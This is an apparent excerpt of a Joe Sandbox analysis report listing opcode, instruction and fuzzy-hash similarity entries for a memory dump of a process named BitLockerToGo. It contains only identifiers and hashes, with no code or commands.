                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: Uninitialize
                                                                                • String ID:
                                                                                • API String ID: 3861434553-0
                                                                                • Opcode ID: b104160ec4795bc23314458df163dce613dbfd880cae4e54145e8062d120f426
                                                                                • Instruction ID: a72cf39690bb13046203349737830b2225212a2f856d7e5ea8ff4a72156b73b8
                                                                                • Opcode Fuzzy Hash: b104160ec4795bc23314458df163dce613dbfd880cae4e54145e8062d120f426
                                                                                • Instruction Fuzzy Hash: CEC08CF88082059FE2019F30BC05036B2B5EF4B326F102438E116620A2E624C1408A0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 840c5a426c82c9e323bb36cdb3d811705a4642a17664625e4635be9f26f71492
                                                                                • Instruction ID: b96f5ee633f27ea76f25ecd010f311b106511cb211d7715f2fadb82b0e8afc1a
                                                                                • Opcode Fuzzy Hash: 840c5a426c82c9e323bb36cdb3d811705a4642a17664625e4635be9f26f71492
                                                                                • Instruction Fuzzy Hash: 5D42AF31608711CBC7259F68D8C027BB3E1FFD4315F258A3ED986A72D1E738A8558B4A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 419747066c544f70e61b34a66988fe856ef02ac95acc54e6233fb588b9e14bdc
                                                                                • Instruction ID: 35a168483c9fd6ef8ad1e833464ca6254c683a1f11ce28cc503733bdcae05e69
                                                                                • Opcode Fuzzy Hash: 419747066c544f70e61b34a66988fe856ef02ac95acc54e6233fb588b9e14bdc
                                                                                • Instruction Fuzzy Hash: AB32DE71A0422ACFDB14CFA8EC917AEB7B1FF49301F5944A9D842AB391EB349D41CB54
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 38e9142ee963eedb3cb87bd59ac15990ce2036751ceac0fa6bae3c3cd7608335
                                                                                • Instruction ID: 242288483fb92eed8e19647918d2604b4ed395ed4d2a1a43c1e9a2b5178add23
                                                                                • Opcode Fuzzy Hash: 38e9142ee963eedb3cb87bd59ac15990ce2036751ceac0fa6bae3c3cd7608335
                                                                                • Instruction Fuzzy Hash: F752D37190C3458FCB15CF28C0906AABBE1FF84314F19897EE89967381D779E945CB86
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1c19b03a2091c8dfe2ce9829f1adda57ee881fffd5cff4dbdc9a49027d63952b
                                                                                • Instruction ID: f6f74706e16185de70c7d534e819a7dfd5bfff91346db5c64032a7770115b388
                                                                                • Opcode Fuzzy Hash: 1c19b03a2091c8dfe2ce9829f1adda57ee881fffd5cff4dbdc9a49027d63952b
                                                                                • Instruction Fuzzy Hash: 1C5291B09087848FE7358B24C4847A7BBE1EB91314F14897EC5EA56BC2C37DA885C79D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c295b2590bbb7acddb490a21cdc07f558af6040c7a6d79778f9a1c511bd7fce3
                                                                                • Instruction ID: 2be2f2ca93193b72bb8e7c09f2ef30bf8983c4816fa1a1512ae2ba415bdc12f9
                                                                                • Opcode Fuzzy Hash: c295b2590bbb7acddb490a21cdc07f558af6040c7a6d79778f9a1c511bd7fce3
                                                                                • Instruction Fuzzy Hash: 46321370915B118FC328CF29C69052ABBF1BF95710B604A2ED6D797F90DB3AB845CB18
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c76cc7ed6bf1a06a8c2460984e45ad9cc7ebb420d2f64c0f94dc0daaf150e643
                                                                                • Instruction ID: 05990068f371ba427fd5fbfeb6ad98241dd9a47c1c85df8b296430c9c318c770
                                                                                • Opcode Fuzzy Hash: c76cc7ed6bf1a06a8c2460984e45ad9cc7ebb420d2f64c0f94dc0daaf150e643
                                                                                • Instruction Fuzzy Hash: F6E17A71208341CFC720DF29C880A2BBBE1EF99304F448D2EE4D597791E279E959CB96
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: e9ab8e5dc88f378edeba0ee9d6be6e4974b883c13f82f78a7735cd915a0215c3
                                                                                • Instruction ID: 35371bf08e94771a708c631b9a2d0ad5f468b099d1ba6952b95789a40331d7e3
                                                                                • Opcode Fuzzy Hash: e9ab8e5dc88f378edeba0ee9d6be6e4974b883c13f82f78a7735cd915a0215c3
                                                                                • Instruction Fuzzy Hash: 44B122706083208BD704EF14E891A3FB7E2AF95354F58492EE5C59B391E739E904CB9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8ff73ed4ccb2d8b75a5fbd66c47155857b4d772e54f1ccdb64e5ba2683b95cde
                                                                                • Instruction ID: 3fb942c185704de5352426567620ff353ae9b97f3d325925a1e315cb59503a94
                                                                                • Opcode Fuzzy Hash: 8ff73ed4ccb2d8b75a5fbd66c47155857b4d772e54f1ccdb64e5ba2683b95cde
                                                                                • Instruction Fuzzy Hash: A0C12772908711CBC710EF24D8816AAB3F1EFD5315F190A3EE49697391E739E990C78A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b0a06e9fa42834ca1afcf3569f5ddf978c2d64a04556f611aee67cc580008820
                                                                                • Instruction ID: 2416fefb3e9b9cb34b2b856c9335412716b2196aeb3aeb23090fd9beb24f04d1
                                                                                • Opcode Fuzzy Hash: b0a06e9fa42834ca1afcf3569f5ddf978c2d64a04556f611aee67cc580008820
                                                                                • Instruction Fuzzy Hash: 6CB10772A083408BE714EB29DC5176FB7E6EBC4318F19492EE855D7381EE38DC05879A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cc1afc0040044c7943f8e1395da7f53c23f974b2d13de7f5d98ad76f0f359def
                                                                                • Instruction ID: 8d9ca2ffe76e72a2b54b9a9b8e37089ac2131f16a8cd3509a04f539d09016570
                                                                                • Opcode Fuzzy Hash: cc1afc0040044c7943f8e1395da7f53c23f974b2d13de7f5d98ad76f0f359def
                                                                                • Instruction Fuzzy Hash: 00C15AB29487418FC320CF28DC86BABB7E1EF85318F08492DD1D9D6342E778A155CB4A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 252e0bd6ebec960a858a45917fb82bdc24872b86bb6e78af503e6fea5f191215
                                                                                • Instruction ID: e1b093123abe9eb8222f9763e6f590ea1885cf7e5012aaf1a6147ad4d7c46cab
                                                                                • Opcode Fuzzy Hash: 252e0bd6ebec960a858a45917fb82bdc24872b86bb6e78af503e6fea5f191215
                                                                                • Instruction Fuzzy Hash: 36A10535A08391CFD7148F28EC9035A7BA2BF8A311F5486BEE8D5472D2D3B5D944CB49
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7ea8d390c7b41216719eb0333768c114fd13bea102474db68c5ceecc49002a2f
                                                                                • Instruction ID: 5bfeccab38c2dcc030ed5a7d05018b35967d944f0813ffece84492e614b684aa
                                                                                • Opcode Fuzzy Hash: 7ea8d390c7b41216719eb0333768c114fd13bea102474db68c5ceecc49002a2f
                                                                                • Instruction Fuzzy Hash: AFA1BA39518341CFE700EF68E99062EB7F1FB8A31AF594869E4849B352C334ED90DB56
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 83fb95dd656fb38aeeb52b3dd99613b203069e56c85675cfa99e06a7418c992e
                                                                                • Instruction ID: 4649a52745d8d8f680cdb4e27cdf668cf3ed428e9c0f72870405661025311a3a
                                                                                • Opcode Fuzzy Hash: 83fb95dd656fb38aeeb52b3dd99613b203069e56c85675cfa99e06a7418c992e
                                                                                • Instruction Fuzzy Hash: 41913737A55A504BC3189A7C4C422AAE6535BDA330F3DD37BE9B1CB3E4C93C48024355
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 715100641acd9171efbc00f7f5dc10c0be7c9ccd6372fd04fe8c61cecda20fba
                                                                                • Instruction ID: f02379e3a699c48a09144c13ec288378891d51d63c9671e0f66b0e71dcabc5e3
                                                                                • Opcode Fuzzy Hash: 715100641acd9171efbc00f7f5dc10c0be7c9ccd6372fd04fe8c61cecda20fba
                                                                                • Instruction Fuzzy Hash: A9817739918241DFE700AF68E990A2EB7F1FB8A70AF15486DE48897352C334EC50DB56
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b187bbdc6c3409bc74f663cf3c7ff3c46978f57e3e5202a44cd0e7d74b56a412
                                                                                • Instruction ID: ff6ca0ca4909975500a6dae02685c912de05ce8678b11bb6960356053cb0f06c
                                                                                • Opcode Fuzzy Hash: b187bbdc6c3409bc74f663cf3c7ff3c46978f57e3e5202a44cd0e7d74b56a412
                                                                                • Instruction Fuzzy Hash: C181DF746487018BE724DF28D890A2BB3E1FF89744F05892DE986DB351E735EC60CB5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9763364f72f725057ddd76937ad7471b6b15be55d6253a7c8842d90d3d913e02
                                                                                • Instruction ID: 3b0c9b45c32abf6a0e285a9905b6d6781bdf3b07d6169927e54336dadcaacaa6
                                                                                • Opcode Fuzzy Hash: 9763364f72f725057ddd76937ad7471b6b15be55d6253a7c8842d90d3d913e02
                                                                                • Instruction Fuzzy Hash: F151E1B16046108BCB249F28ECA2677B3F4FF95364B48462DE886CB795F738E944C365
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 622dfe3c7bad702f8822d4cc6ae02a959df1c472f5e505591eedf8d004bf0acf
                                                                                • Instruction ID: 20b578fb44782e9cbb27c20720df7153ea39f202ba52ceca0415251cbc83a1a6
                                                                                • Opcode Fuzzy Hash: 622dfe3c7bad702f8822d4cc6ae02a959df1c472f5e505591eedf8d004bf0acf
                                                                                • Instruction Fuzzy Hash: 6261F231608701AFEB11DF14C880B2BBBE2AF85305F18892EF4D58B352D779E841CB5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 204fa4690f12add3ab1589564599d39bc9596e449c20781f0f87061e71bb567e
                                                                                • Instruction ID: a88e89246c37e7f37e899fead5ab7a793ecc08258b217f519a746bd5aed74f86
                                                                                • Opcode Fuzzy Hash: 204fa4690f12add3ab1589564599d39bc9596e449c20781f0f87061e71bb567e
                                                                                • Instruction Fuzzy Hash: 9161B271A01216CBEB08CF68EC617BEB3B2FB48311F5984B9D902A72A1DB35DC51CB54
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c8fc74abb6948433ac310de4d6c7f31935f63fc015297f42b1b36e2244364467
                                                                                • Instruction ID: bf28f41bc9116cf03e6429a6917dc4021cff71addabcc6d6e473c50653d6c410
                                                                                • Opcode Fuzzy Hash: c8fc74abb6948433ac310de4d6c7f31935f63fc015297f42b1b36e2244364467
                                                                                • Instruction Fuzzy Hash: D5519C79E00315CBCB20CF99E8817AEB7F1FF45304F54859AE848AB351E739AA41CB55
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7637c0e4648c2ad0c57ddb4e578dfe89efe5035792d3a4d588bb0f0f2710d50d
                                                                                • Instruction ID: fd5a4f873d1add55ca47da51ba38548d2c400ac62a933c7d49b65120dd7c20f6
                                                                                • Opcode Fuzzy Hash: 7637c0e4648c2ad0c57ddb4e578dfe89efe5035792d3a4d588bb0f0f2710d50d
                                                                                • Instruction Fuzzy Hash: 70514579200701DFE3208F25E880B16BBF5FF8A302F148979E89687A61D774E854CB68
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8a63adcc01f51a8e0689099253f509df49ee44bfeab751bffd44707f859587d6
                                                                                • Instruction ID: 1edb4407df6ead3698bc17e2a90f01d61fecde54092aad1d3c134665efd44e0b
                                                                                • Opcode Fuzzy Hash: 8a63adcc01f51a8e0689099253f509df49ee44bfeab751bffd44707f859587d6
                                                                                • Instruction Fuzzy Hash: D3515BB15097548FE314DF29D49475BBBE1BB88318F044E2EE5E987390E379DA088F86
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b798695b6a62333c45494d7cbc03703c5cdd50205fef1ab28ad5f6a78f19c1cf
                                                                                • Instruction ID: 395d1cb9a54da71ae4b5b1ee37ebdc4b5a6fc09e777ab4ba5d3341e98cdef2a4
                                                                                • Opcode Fuzzy Hash: b798695b6a62333c45494d7cbc03703c5cdd50205fef1ab28ad5f6a78f19c1cf
                                                                                • Instruction Fuzzy Hash: 4D51C07111C290CBD7049F25E4A466BBBF1EB8A34AF89886EE4C54B352C739CC50DB59
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d9131b43dda350215948ae43ca985155a40e29f3f1b0155248c16b539be7898a
                                                                                • Instruction ID: a76c8e47bf329525fb2518fc10c67dc932cd72ac36833043db8261ccc8c054b5
                                                                                • Opcode Fuzzy Hash: d9131b43dda350215948ae43ca985155a40e29f3f1b0155248c16b539be7898a
                                                                                • Instruction Fuzzy Hash: 15510337A0A9C14BD7145E3C4C552AAAB531BEB334F3E93A7D8B54B3D1C5AA8C034356
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fd65f1c84199182c4cae32c76aa12f8cffe395e64ccf35c191b1c908571f5d9d
                                                                                • Instruction ID: b7ff14bf57eaf1cdd4a48445fb9ba01728ca6d84d7f14bf17e4631ee976be22c
                                                                                • Opcode Fuzzy Hash: fd65f1c84199182c4cae32c76aa12f8cffe395e64ccf35c191b1c908571f5d9d
                                                                                • Instruction Fuzzy Hash: A25191716083419BE704DF18D894B2FBBE6EBD5345F24882DF58587362D339D850CB5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 702e8d1eb97fceedbe012dcd1d1545ac27dd2994e95fbe9ad8de983222512fcc
                                                                                • Instruction ID: 6a134ced9e0f225d7b1ff73da5ec1c93455ea431e7a810e534fb8e908a2e6633
                                                                                • Opcode Fuzzy Hash: 702e8d1eb97fceedbe012dcd1d1545ac27dd2994e95fbe9ad8de983222512fcc
                                                                                • Instruction Fuzzy Hash: EC51BE78E00215CFCB20CF95E8816AEB7F0FF06305F54446AE944AB391E739AA11CB59
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 571cdf5b34d628592fba676671ed0bbffc5cda39c021cafb35b5c8dbef28f427
                                                                                • Instruction ID: 48d24bf4e20630f7a0ad0d0f0d9b8a4c85e3c55ea68d9ad34fa3a68914599aec
                                                                                • Opcode Fuzzy Hash: 571cdf5b34d628592fba676671ed0bbffc5cda39c021cafb35b5c8dbef28f427
                                                                                • Instruction Fuzzy Hash: BA51AC306082009BE724DF54E990B2BBBE5EFD6744F14882EE8C997352D379DC10CB6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f84a9ee1bb3191b8419405aa882d227fe8add42e094a4094557e67bd87944ce4
                                                                                • Instruction ID: 2b34357cc050dae697aab8c20bcef27ff360831558baf573e1e8819353029123
                                                                                • Opcode Fuzzy Hash: f84a9ee1bb3191b8419405aa882d227fe8add42e094a4094557e67bd87944ce4
                                                                                • Instruction Fuzzy Hash: 5051D474A047019FC714EF18C884927B7A1FF85324F19867EE895AB392D635EC42CF9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f0e8bf1a8dfbf309aa2704a187875364e6825f426002c674addfbae97ff983cb
                                                                                • Instruction ID: 946e22686713ffb89c80568d0bd861725a648e0653ca7876b05aa5e9ee937bfb
                                                                                • Opcode Fuzzy Hash: f0e8bf1a8dfbf309aa2704a187875364e6825f426002c674addfbae97ff983cb
                                                                                • Instruction Fuzzy Hash: A9413927A095A14BC7115E7E2C602796A160BB3334B7E8F77ECF5673D1C12A4C32939A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2ac97bc53b866c013a7b20be15e30629af75e8c628710c8566ba6b4e911e00fe
                                                                                • Instruction ID: 73d2cb79d1cf73827fef7d24ee42fe707334323465c2c15eab7b30a8f535ddce
                                                                                • Opcode Fuzzy Hash: 2ac97bc53b866c013a7b20be15e30629af75e8c628710c8566ba6b4e911e00fe
                                                                                • Instruction Fuzzy Hash: 4741D134248300ABF714AF15D995F2FB7A5EB85714F24882EF58997291C379EC20CB5B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: cfdd4316b468c05074cee88a30fc60780713ef8fe063a93deccb68505f7fda65
                                                                                • Instruction ID: 4e5c7ada005c608a1b72f2e48c3a477abb1f3d7ef40308193452ec5189d588fe
                                                                                • Opcode Fuzzy Hash: cfdd4316b468c05074cee88a30fc60780713ef8fe063a93deccb68505f7fda65
                                                                                • Instruction Fuzzy Hash: 8641A038248300ABE710AF15D991F2FB7E6EB85714F29882DF5C997251D339EC208B5B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ed9d2257b554649ee41b9b09c91c77b127f6c0b772bb120f197f5eb07b1c55f8
                                                                                • Instruction ID: 4ad717ff276a7d2dd95f75abdca51d7c68ed5f16040c821817346e123de3731c
                                                                                • Opcode Fuzzy Hash: ed9d2257b554649ee41b9b09c91c77b127f6c0b772bb120f197f5eb07b1c55f8
                                                                                • Instruction Fuzzy Hash: A031D675608304EFD300EF55E881B1BB7F8EB85355F40492AF99483291D739EA058B6B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 21c1cacea7c292397c36a41f47572ec33d5cdbddb8ff198c048a63802585a0d1
                                                                                • Instruction ID: a28ea87b4cdf23c49cdf0a34350879734f6f043490e1e18d2308fcd0ed39d755
                                                                                • Opcode Fuzzy Hash: 21c1cacea7c292397c36a41f47572ec33d5cdbddb8ff198c048a63802585a0d1
                                                                                • Instruction Fuzzy Hash: 9D412472B1C3A10FD318DE3A889016ABBD2ABC2210F19C73EF1E587394E678C946D755
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4d72f01362018ad371eefd8a524d9e36182b7538809fee267f20dad26a43ed1a
                                                                                • Instruction ID: eeb947225e77f8508b0646d19ff5d7abf6a8b6d8e15c9fea3c96c9e6945ae047
                                                                                • Opcode Fuzzy Hash: 4d72f01362018ad371eefd8a524d9e36182b7538809fee267f20dad26a43ed1a
                                                                                • Instruction Fuzzy Hash: 20313970509340ABE301DF15D584B1FBBE2EF85B19F24C86DE0888B251D37ADE09DB9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2326311368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 381fc0e58d431632e31046f02403169205f446621c394491b165389b8b7ba854
                                                                                • Instruction ID: 3bce176757ef80e491d547bd4d322477483af3c25bf236976f99a59fbd47cce6
                                                                                • Opcode Fuzzy Hash: 381fc0e58d431632e31046f02403169205f446621c394491b165389b8b7ba854
